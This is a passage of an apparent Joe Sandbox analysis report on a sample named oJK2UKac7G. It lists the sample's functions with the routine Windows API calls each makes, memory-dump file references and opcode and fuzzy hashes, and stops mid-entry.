    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CAC0A9
    • GetNumberFormatW.KERNEL32(00000400,00000000,?,00CD072C,?,?), ref: 00CAC0F8
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: FormatInfoLocaleNumber
    • String ID:
    • API String ID: 2169056816-0
    • Opcode ID: 9d16e2e48ff2db63a1d151b9857d4ab3cfd0a788fc6b6a97ad2c48580741ab95
    • Instruction ID: ba02a04f91e63210559eafe75acb0c736df9e0ab1463c89852a3f4e4cc29434c
    • Opcode Fuzzy Hash: 9d16e2e48ff2db63a1d151b9857d4ab3cfd0a788fc6b6a97ad2c48580741ab95
    • Instruction Fuzzy Hash: 91015A36140208AAD7108BA5EC45FAE77BCEF19714F119022FA14AB190E370A954CBA5
    Function 00C97727 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(00C97886,?,00000400), ref: 00C97727
    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00C97748
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ErrorFormatLastMessage
    • String ID:
    • API String ID: 3479602957-0
    • Opcode ID: 517474cd134be60de86d6f295b48b8fef69a67100efd97bb42d36cf1791ecd17
    • Instruction ID: 1ceae1aba853adf9edb6ec97a3e583f9539a1e876e3af704b26ac5e0f73ebd76
    • Opcode Fuzzy Hash: 517474cd134be60de86d6f295b48b8fef69a67100efd97bb42d36cf1791ecd17
    • Instruction Fuzzy Hash: A1D0C931389300BBFA120BB19C4AF2E77A9BB45B52F14C514B755E80E0DA70D425A729
    Function 00CC2BA4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CC2B9F,?,?,00000008,?,?,00CC283F,00000000), ref: 00CC2DD1
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ExceptionRaise
    • String ID:
    • API String ID: 3997070919-0
    • Opcode ID: 4993c6712eb0595bef90396ce1ab92e0dc27840cae93facf6a05e28a382730d0
    • Instruction ID: d3366899de54ee0e98a25c7ee1f2f682502d14edd96a46095b036e0ac00ff092
    • Opcode Fuzzy Hash: 4993c6712eb0595bef90396ce1ab92e0dc27840cae93facf6a05e28a382730d0
    • Instruction Fuzzy Hash: 3EB14B355106099FD719CF28C48AF657BE0FF45365F29865CE9AACF2A1C335EA82CB40
    Function 00CB0816 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
    Download Yara Rule
    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CB082C
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: FeaturePresentProcessor
    • String ID:
    • API String ID: 2325560087-0
    • Opcode ID: e8722d349ae4fac492399d558a76f1d05c7efaa47371bbf3937b53b760deca20
    • Instruction ID: 7cdbee761ba416c3124e624dc634d1633d713ce7b5022515995d4b5678d3ca13
    • Opcode Fuzzy Hash: e8722d349ae4fac492399d558a76f1d05c7efaa47371bbf3937b53b760deca20
    • Instruction Fuzzy Hash: 88517AB1E112559FEB14CF58D8867AEBBF0FB48310F24852AC415EB2A1D7759E40CFA0
    Function 00C9C365 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
    Download Yara Rule
    APIs
    • GetVersionExW.KERNEL32(?), ref: 00C9C388
      • Part of subcall function 00C9C3F7: __EH_prolog.LIBCMT ref: 00C9C3FC
      • Part of subcall function 00C9C3F7: CoCreateInstance.COMBASE(00CC68A0,00000000,00000001,00CC67D0,?), ref: 00C9C41E
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CreateH_prologInstanceVersion
    • String ID:
    • API String ID: 511865808-0
    • Opcode ID: 596985ddfd43606b1f0b4110a78e11d45b9be5d76b0f642e8da404ad22162008
    • Instruction ID: 37fd0f195a8e3710c871f1d02938836a7123828c394c865ef9e39b57a1d6ab5c
    • Opcode Fuzzy Hash: 596985ddfd43606b1f0b4110a78e11d45b9be5d76b0f642e8da404ad22162008
    • Instruction Fuzzy Hash: D2F082305062C88ADF26DB21B84E3EC3BE46B11308F0480C6C550525A2C2B59789DFB3
    Function 00C94A8E Relevance: 1.5, Strings: 1, Instructions: 276COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID: gj
    • API String ID: 0-4203073231
    • Opcode ID: b87913879b797029f4fde30ff3935f7652840f1aa8c3ded1de610a975d422e5d
    • Instruction ID: a334577d962e5a5349126bbf3f728db8df22f6aa7bc2ef75259c4b9cc4a5c9dd
    • Opcode Fuzzy Hash: b87913879b797029f4fde30ff3935f7652840f1aa8c3ded1de610a975d422e5d
    • Instruction Fuzzy Hash: 11C138B2A183418FC754CF29D890A5AFBE1BFC9308F19892DE998D7301D734E945CB96
    Function 00CB0B8D Relevance: 1.5, APIs: 1, Instructions: 3COMMON
    Download Yara Rule
    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_00020BA0,00CB05F5), ref: 00CB0B92
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: e554bfc2227e8a27885a25bfc2feb2cedcb632d2e4c9437f07fc6dd0f38ae26e
    • Instruction ID: a162a6897411de75d8a304d5750e6b6474ed5b245a12189cc68940b2e2dad917
    • Opcode Fuzzy Hash: e554bfc2227e8a27885a25bfc2feb2cedcb632d2e4c9437f07fc6dd0f38ae26e
    • Instruction Fuzzy Hash:
    Function 00CBD1E0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: HeapProcess
    • String ID:
    • API String ID: 54951025-0
    • Opcode ID: 6291a000bb37c36aa565816888ae74cbd5d004ca4f3eaff7f1eaff6a2a4315ac
    • Instruction ID: 2b59f8ed8862561e1eda3575dce73f0fbb8806d8d7aab37da7fd27d5996f5cf6
    • Opcode Fuzzy Hash: 6291a000bb37c36aa565816888ae74cbd5d004ca4f3eaff7f1eaff6a2a4315ac
    • Instruction Fuzzy Hash: A3A01130202200CB83088F32AA0830E3AA8AAA228030A802AE088C0220EB2080A0CA02
    Function 00CA741E Relevance: .8, Instructions: 807COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2d6d7b90b0f167eb106e84e75b72c36f6dee5b774374e5313e1240face5eb564
    • Instruction ID: cd9aab842019cd341bdcc65bb00841436f23e0249f73a8b2775aaa12f59a950e
    • Opcode Fuzzy Hash: 2d6d7b90b0f167eb106e84e75b72c36f6dee5b774374e5313e1240face5eb564
    • Instruction Fuzzy Hash: 9D62FA716087869FCB29CF38C9906F97BE1BF56308F148A6DD89B8B342D734AA45D710
    Function 00CA889F Relevance: .8, Instructions: 781COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ceb54f0b1270e70b00e006b9306f911088e896e5099abdc2083c34249c5c05d7
    • Instruction ID: d5a13ef9d79113a3f0110a98a9441521030caac762a67a18cbc5b28434e7ca23
    • Opcode Fuzzy Hash: ceb54f0b1270e70b00e006b9306f911088e896e5099abdc2083c34249c5c05d7
    • Instruction Fuzzy Hash: 0362F871A042469FCB18CF28C4905B9BBE1FF56308F08866DEC998B346DB34ED59DB51
    Function 00CA07A0 Relevance: .7, Instructions: 694COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: bd9e78f3eedb31a401d47d299b8af698bf32d54c623d11bd157ec233ddef8b59
    • Instruction ID: 30ff77e38af6ea1cf077cdced19ccafba476e5041f762d57ab8c1a7e58a1901c
    • Opcode Fuzzy Hash: bd9e78f3eedb31a401d47d299b8af698bf32d54c623d11bd157ec233ddef8b59
    • Instruction Fuzzy Hash: 23525A726187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B245D734EA19CB86
    Function 00CA8243 Relevance: .5, Instructions: 528COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 75a6c7353a8a33706721fa710000fdfa30795a2ac6dfccabb459818148177c32
    • Instruction ID: 377a3a1d7f1ba1217ee35d7299faf80cbd7377dedb7310f4ee94782f2696604e
    • Opcode Fuzzy Hash: 75a6c7353a8a33706721fa710000fdfa30795a2ac6dfccabb459818148177c32
    • Instruction Fuzzy Hash: CA12D4B16047078FDB28CF28C4947B9B7E0FB55308F10892DE99BC7680DB78A999DB45
    Function 00C9D833 Relevance: .5, Instructions: 454COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e2d4bf872d1e38404c25c8f5e948e646bb202fa0660b79df069a15fc4c954ead
    • Instruction ID: 6da93358ed6ad9a9b64115e0cdab9a03d0d497b6b3e8a720e73411404a2109c2
    • Opcode Fuzzy Hash: e2d4bf872d1e38404c25c8f5e948e646bb202fa0660b79df069a15fc4c954ead
    • Instruction Fuzzy Hash: 3DF1AB726083018FCB14CF28C588A6EBBE5FFC9714F144A6EF4D6A7251D630EA46DB52
    Function 00C9FCCC Relevance: .3, Instructions: 320COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1848cea3204188197add5efffb3b71df807227de5ceeb732399b445cba432890
    • Instruction ID: 0e9932ffeed0213dd2c6b035d2fab1302897189f20093abc3e9395d2ff92b6d7
    • Opcode Fuzzy Hash: 1848cea3204188197add5efffb3b71df807227de5ceeb732399b445cba432890
    • Instruction Fuzzy Hash: C2E17C755183918FC304CF29D49066EBBF0BB9A300F4A495EF9D487392D734EA1ADB92
    Function 00CA5272 Relevance: .3, Instructions: 270COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ba3de1ab45ae5c8f5f4579ae5924f9381ce7f15d2f6fcc5ff34ae3ece2457581
    • Instruction ID: 7e2c3a7bc169528c22001a3eed61e1b95163941f716eaa507dced5b2a94dfb28
    • Opcode Fuzzy Hash: ba3de1ab45ae5c8f5f4579ae5924f9381ce7f15d2f6fcc5ff34ae3ece2457581
    • Instruction Fuzzy Hash: D79179B1200B0AABDB24EF64D995BFE77C5EB91308F10892CF59787282EBB4D945D341
    Function 00CA55A0 Relevance: .2, Instructions: 243COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 68e6acee6c9f498f5e15989f60e614e6aa36cc50bb8c8e6a6afc36a9cff0e6f1
    • Instruction ID: d790a69344735d8cc00e6ce73f38b1152093cf03aa4555967f94ffe6d592daaa
    • Opcode Fuzzy Hash: 68e6acee6c9f498f5e15989f60e614e6aa36cc50bb8c8e6a6afc36a9cff0e6f1
    • Instruction Fuzzy Hash: 29816971304747ABEB24DE68C8C1BBE37D59BA230CF00892DFD96CB282DA6489859751
    Function 00CB64C7 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c3b14570e80e7a6f82c21112f8274555a22f4e1732eda15fd70ab25eaeddc2c4
    • Instruction ID: 9832e9e3b0ab77d77108cc1c5f92308c9929f01d4dad500083fb1de03eafe0ce
    • Opcode Fuzzy Hash: c3b14570e80e7a6f82c21112f8274555a22f4e1732eda15fd70ab25eaeddc2c4
    • Instruction Fuzzy Hash: 4361ABB1240708A6DE388A68D9A1BFF3398EB00704F10052EF993DF2C5DA2DDF599315
    Function 00CB6298 Relevance: .2, Instructions: 214COMMONLIBRARYCODE
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
